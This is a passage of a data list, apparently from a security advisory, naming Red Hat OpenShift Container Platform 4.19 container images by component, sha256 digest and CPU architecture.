"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:8df5c2a7eca23f5a88c99db98340446c2c0d2be2ccf22a62753e955a9da54fd5_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:e0db3311e3862b0fd875d6da134be4cdb3ff6d032591632c35b71aeba2cd6e3d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:30a687482b427b9d447430e0e7ef60e310b9dae5032407b03da36d7795e134c9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:42777662e34fa44925901dd1b8aa9537a389c167557b6287e1b01f13675363cb_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:46a134239b3b4a2792fe663a645b0c5d01a48c7db7d9c0fc71dd50c96d2fbbc4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:7b8211056c73804d6072ec729c67cb6e77042e517009b53a0a420efb1a3893dc_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:0c307a3ef1df661bd3a634fd40ea47de440bf061f2f1631a430b61f6426903c9_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:9ba38f81d114b4fa4e3523ec46ce02bdcd4b5a122d399968bb7d6f8eb8bba271_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:bf98482d9796579be39293dcb59f424e87eff66f1af285ce773cb61b7eb7c7d7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:fe63945e16c13db6513a214e52c7df6e510806faa3548b5c5658ae4d1c30176b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:48460c041bdffd7940cb9abb2385a6eb9eda698d1155a6e11d948336fb4c81eb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:9c67187eef0b78888e5299143dac7efa69d6c06fa44b9db0a92d4447f7333a0a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:d0fd4fb6c3aada9546a70b24740460db48607ec9333155e04b233b7acf92bde2_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:eb5cee38879cba152e5979d2ec6db64e2cef6bba8dd82cbd18461aa2af072282_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:047391c0706f4f8c7a8c09598ed4d2900c9154cba66f633dc2df220941e978d6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:3344aa2c937d0e7c24f5f7394a50bba34179fa527f9d7492b951f81fce3ac9c4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:9073193ac055f63809d630f43508c41c2fa3bf07d6ca023667fd9fda5daf6117_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:be277357a0ad4546a23c375494eaff76ba1af97f8d77bce6d21ab722d990f749_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:2fc0e9d7cfb095ef01f513ca422a0dbd2b3fa31f8a46b8ed679550d77f3df2fa_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:4b1651037396367c71bfff638a9a8ef32aac4c570389b4d5d95a992d9eb44876_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:4e46a01af9e94831db7732d4747ffa011a3e634792c2076628ba225bce1baafe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:c5093213a910684e94394a0bb9f931c2b62dce522bf1926e0dbf17220d166d3a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:1fc4a052d1a2f71ad6d2bbf61e0a1037f7e2440debd131eace7d32d0fab11cee_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:54ae01b23db949ca63116514359f1d2bd5a7f7d44b3578fc821d432c4da95e68_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:7bb48785d9f7c7fbbdfea41e890259a9d3bc31fa5676bad18d497aa77da498c4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:e3c50d3961173a74abdcd965f0ddf63bca5688a0ae2efece117108cbd0dff616_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:accb268a968dd5bc57d1252a01fe3595bc021d13a5f06f56d2e5a117b1d2c1f4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:b508a70e9653143eea20c73de1605c56286a9762ce0090310955e036ea176ca2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:bd5db1b792183d1ca64dd35d5ca0239b2283b61bf1e01b95efa15f6053761b89_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:d1395c330a8fae9d244430dcdeb377c9f11e1f52c0e2ea18a3347cbc981e2dbe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:0f5213491694928368f537b0484d07f929f8849470db7ac791ae672dda916aed_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:274f0a198e8abfb43cb903534311f3e8a29cf44de59ce1768ea5f252aa9593de_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:575db31ee7397addf620644e731075e091daf9d967fa3e1b5aa916596f9025b6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:acebc3ebf8ae744a19fbf05555531c66f567364b2cacdcde9b3ef57f35cc5bd2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:0df81a471b525e99a5084cd3fdd23a75f9df9f1916944e877c264f35bce94b8f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:3a37459b3a961cc1b3f3e64198885b19dd30f013b885af167ad52eb82dc1bb5f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:4ca3976b2c2e300c52d742522bbe52e8d351bd689d60e9e8f5c8825ec711520b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:97f61670284c2a539430a564cf572ef2af3ac96ace4c8b9aeb126989c6759abd_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:089ee476ddc1e24bcd421536afea9b800bab93bf4ad5f507109b84b6520b5126_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:5887e28e667ecdf6d9df4bfad8722e18cdf691806f4ee7f2c2e48f14b5d8b3c9_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:b654d350a87e6e4b6a217bfc59909cbc7d1e5a4359d1c7fd18b733dfaa992a48_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:cff13d6aed7130ce1277bb14c7cc2320e317aa46b7488c5c25a0df1e1d4074c4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:2184859af194b46e0c19c3b0f03194fba334c03bc5696a0fc8e9c6476c12d14d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:2625c625bc24ccaede003e95c02d2da4868434f6c9b73fe836e82602d6e00a91_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:bce8d9eb7f66cde071409af9074772ea3865a84b1a89bdb30f72d2e0660aa67d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:c28a0834626b38f25a88ee742e048c395c260065658ae4480f702a21b42cfcf6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:3d5bd790fdd446b6f2b896d61b9a4cf340202d90414453a08c50a5db98c032d9_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:6a104339c2dac844a32bf41939a964686a828c4db71f25b2046fb9a674f9ca2f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:a252f660abcad58c53b292d4c79a597ee78be4073225aa5613e265db5c12b66d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:cb7c3ffaa32b1adfde8526d45e7b05dd3e09597a47e9e01218ecaa70a4f5d444_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:0c0a7de41476c5ebe5774b6cb3534894f3cc995d369299defa385e525da08084_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:221edbcc230c19826adfc6bf31bf9187534ead6f2a9df78356668641510f5114_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:50a91f97f125beab6b358db53c9ba51eb0f4157d4818a30a2e2237f51ca0eeea_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:dd3f1539969b9f3f8d6406afed03d54518123ed5891dbbcc10f205689f2395af_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:90ce5019a396232870e95034dddd85f24fa520759c0f25f299c820c13971bb5b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:c2b2b7454a2e108e9c6c1a4b1906a1aa8c468928935aad391d13d3368fe6207c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:e1055a31afcfca83dfc304c7cfdfb4bc00bc6bf3c73e966ff52c19dc36343f07_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:f677c02c340f4c81425fd42cc7f272c9f54cd5c5865dcf300a19c89f1cce04a3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:0d05cfa770dfd10491cb290afaf8498cbe5235a61781fedd7c5284060d9a7e34_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:9bfbb681aa0fa12a4d9f7b3d1fec220d56298316a6c4552738d2ad423a0db452_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:c68dd5162089b67cfdf72c82476399701c14ccade5d16ba9a7d549db57376013_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:c805d6a4bd3b4252cae2641eb8b3db5be30c72be2bc3a16b4414bc438ab9f82d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:4ceb2e354044e443c6a4f05ccd6b780962ac403f1bf3d8fb424370cf00ef8e9b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:80e754d013536142859f268b98cac5684a857d208946ac9bc13bcb3fc3831cc6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:cd2a286c7f1489c14dbf17e4974dbe9e4e9079f5dd997298666d784d4818e3af_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:e233699c5d3110c15ec314d79f5e21704af94d251600deac0eb601327fba7e37_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:0c31b9504442d00332e3124223d25fb444a293b7af1ec77b12fdc6e2247171f8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:324d8f98fd958c228de17a6ad0d88827b042eb651b296d76cb487300caddc254_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:73e87cf74e68425b3407a7bab4fe53a20b11f93408d143e73809867a4dd8b509_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:c180d76665303a1c806911447f34c843011c3060ca198a5238ed0f64d9becc74_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:6194a64d8e710070fd29abdd118703c215ff6651c1356186f39ad59d5cc51bcd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:c185f56cb3ae0d3f522cc459da340e3b939bbdd1543258c6a2e7cf87f2045c7b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:e6b13406fbaea6295e5bffbef0b109513d8b22286b992e6ebe9bf23095475b87_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:ed6c2f8bfe2a67e986e090d39ecee8713e2fb0f85e87ba89652174c977845d95_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:0d15b65a5b1e662400e81798702500b889e3256644d84ddcbfebb9a70c1a1cf4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:2667a7138ce10557824bf4f5337c2cb9d3c4c3aee56f3d303aebcce4d7d79006_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:2c8bfcde38a23b93e8474a20f98c6dd58b6fbd1d5c0773a45cab9e56f8796cc3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:b391bcc49e93b19233c4a25cace7e2a787232bf2d915939440184752f09a18e9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:0f31780ee3816f6e40944c0429b36eec3de2d2be03e85494498d3df2f2667cc4_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:176ac0dff111c759bee1251925874b63b60c5f42fbefae44c6518928abf7f58b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:7b2a691e66dfffb9f0a36d4069db83c068d3792e1b16e426585d164b24b608aa_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:a8407b116617836506303cc1d9c3d8dbeb6a134923a9bb6dfd41435495a48a0b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:46f5aedf9bffb142d8da9d0420180b95e658101190b32ce1c86da1c53c1111bc_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:718a20a7c4b91391c72ed16452d3dd0fcf667ce3912cdcb96d4d5cb0b476958a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:8a660d559fa1d4b5facdaebe5a55bb8706cc0f098591d3552446d45b533adf81_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:fcf9efa15997c8fa9dc9a1681ac14ea46e0e959cf4a33933440103715b2c6617_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:75f4a2547e299c901ce632bc3f7770717b0b52a5d3fe79b4687406ff05490e0b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:96d19a18b20a9e8ed81918aa1ad3b12e7a8ed4786f3d655d3e6c61a1362c5ea5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:6171572cbb98e637db55e72ae4f00bf1e64166e65485825c83bdf6031339f581_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:8524355b257cafb5460396c2b2f85eaa803c7bdaeaf31d5eb55528917eb94d47_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:3733c9a79c632dda29eb7635740f4ab45234207be76bf6689fe75037a941fd1f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:fdf560dc1b05690089f38a02e103c01be9156c4a5bb6c4d8faae4111e27aa92b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:1045e8dc9ce690faf4cf4868b2c8ab4984d26887ff2d8d7390cad475099d6226_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:3de13524a55ba2dd2013834445ad7d04de251303e67cd49df82a1274c4e5d5df_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:6eac8f9c6ff815dc2113652386ea7a0905e7ab0a008d2d89dba5d9bed116b61d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:eec95e6623fd06e16ba393b102f2cfb268037e4379743423093d56fe2fc42dea_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:076a61f04e000b8c1c6d3192342a3112905e9ea05b2c060d6b68b1da0c7c2ca0_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:75bdfd4e0a6c82ae908e82835b11447b4af89bbfcfe7544c9aeff54adf2452a2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:7715c2111abc77e11b7544eb351b9799d0d0fc029958e34680673d225581bdbd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:9c354366074059d7be301b438cec1791479ced4f77a1b3702552755a12d4de32_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:385e609692f2d6ba0f6512eca051371f15471d6a4ac86de4fdeb2059c1cb9ddc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5aa042fbd253a7e644468a8a6a7df06a206bb5556ba4d2e0bf36a12bfeaf1bd4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5f47a5d1025b8499572c93c4fbd1c8596e8afb2291a3408db77bb0d475b179a6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5ff1fab804d261aa3ef884e9288eadaea59bf40a26face259decb7e3a686a85f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:15fa093433263f5b73be4d59d0bbadaa6f0201f0d8bb0e72ed4187db8ebd4ecd_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:58059ecb3d457599d000a7a113b943e53bfdaed0225b6df8cda9ff83f1c30b21_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:5f723bb5d81abb468b45850e894aa3f719cbac259b5a425b1abf3fffba3d7866_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:fb63e1f96831506bc79fbdd4f78ee9da3913f86f128f538db70a8badc23ac854_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:07a5ff47f0ddbc7ac2293a6f6af6ed2a9cb4027e7ad61042863187df69babda3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:1fbb335fd71191a6096d16c4769716255b833d9fbbfa60d4f12dc014e5d24da2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:b8a54951f2fb26aa2b0cc93634a7147e4f2fa68a6986c527c5fda7ced2007e90_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:be5b247472e8155811e40b74a539d15d649c6175e469184aae7cc7a3ae435563_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:0f01b3199d4bbd7d691bd416ce41adb2123807534c965355e03ae0469425eb89_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:387d9d633840c30c52695f776e48e80031e110b05c9ef082597a5cdbf9f5eea2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:68f71f58e04099967346c0fae031fde60887bbb7dd1041c4d83a0b98455dabd1_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:df471031bae8d15bb58bc650ab6d4b9f4fa3f0483cb65838ad147594ec9f33af_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:07dfb0c56f132cd5acf76e5879f521be9abdcf5dc4e2fc663e89739f5e0d5538_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:8f02237f34890ade5878008f0c923597951019454ac5353a63c6616dd33f8f2d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:9979f3eec067571040422a0ad1b96b993a415bf2743960292df2a95b279ca695_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:b46b98d3ad75e63e9be7b603a77e27075653ec3afb7e8689fdd182cf40abd3f8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:3582bf5119513e9d51d83e2d1b3f70a955d2a0675e0b120ba7f6394e94b94e03_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:6b0e909a37e06abaa39c795be926d2da861b9f00fd4c0be18fe7890d825cb6ed_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:ab94610c1dd35f92ad186846735758cf5a301d9bc4e883b2692011988edb4fd3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:cf8b7ce2d36bccb2bcbee8bfd0de6bdae5dc40b0199059b2759d0aba56151baa_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:510a2039d88a9f1ae59848d4f6589b7585f002c68f0da8f8a970685d7fb40a5e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:6db47ba74f791eb39da7af1862d8978da61cbfd88219441950861ef469cbe472_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:6ec129d640af33af43d698593ae543d22394d0b7bb19b2fd89dfd257e5629ba3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:f09043d293b8948f83da5b5722a0edb74ae3f54b58eeea19c490c0112bad2071_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:802e9ee888afb88e576fee42f11c7ee0d6fcbfb7b5213df16cac12c2b75a1d7c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:8cc4458a66fce822d175559277398c7aef9ddb383399efaf80650c2f350505fd_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:bfbaa99fb697f2a352b97de52a35729481556ac4ad3efadf6b796356a2830fd3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:c1de6ec5108a02b21c15f44308fc3a9b4293f94353c0f25f11576a74fb21ce5d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:622a5b555fb855d565a2c66137c248a239a364c00671d271782695d144d8a56d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:640febb01fbe420ea03dcf3cc19bb8d0c9cf26c4af953133d51347baef830441_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:ce22905d9a22de00509343c81f9400e436132912a9ae6ddf675c0928f3ea4d27_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:d07ec10275070567596dfccce0a09bd2fbed9d5d452a813f26b1aa3d313b9d71_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:7ecb1d8a291da4a5113355fb9cd53efbe82879d419678800984d8d2b0b1e2b60_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:aa490b00e5c8c799fed61101cdcb32447eab6caf4c4c1037f1a7f9b5ee5c2500_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:ac962f2ec19c1cf0922a5af1d60c6535da0d2bb2e3b1f2bf60f559e7c91fa659_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:211d64fbaf9ecb4d767c4fddea4eadf048ff3783ab8aa28bde76844eaa735361_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:c373f479b51f2bd757cac4f24479cb9056d7745d588cd3a563c364dd63a55d88_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:fadf5aa90de3fda8b5253c6338406a0eb64866e3f3aab1bfc5f5c0713f3c4277_ppc64le",
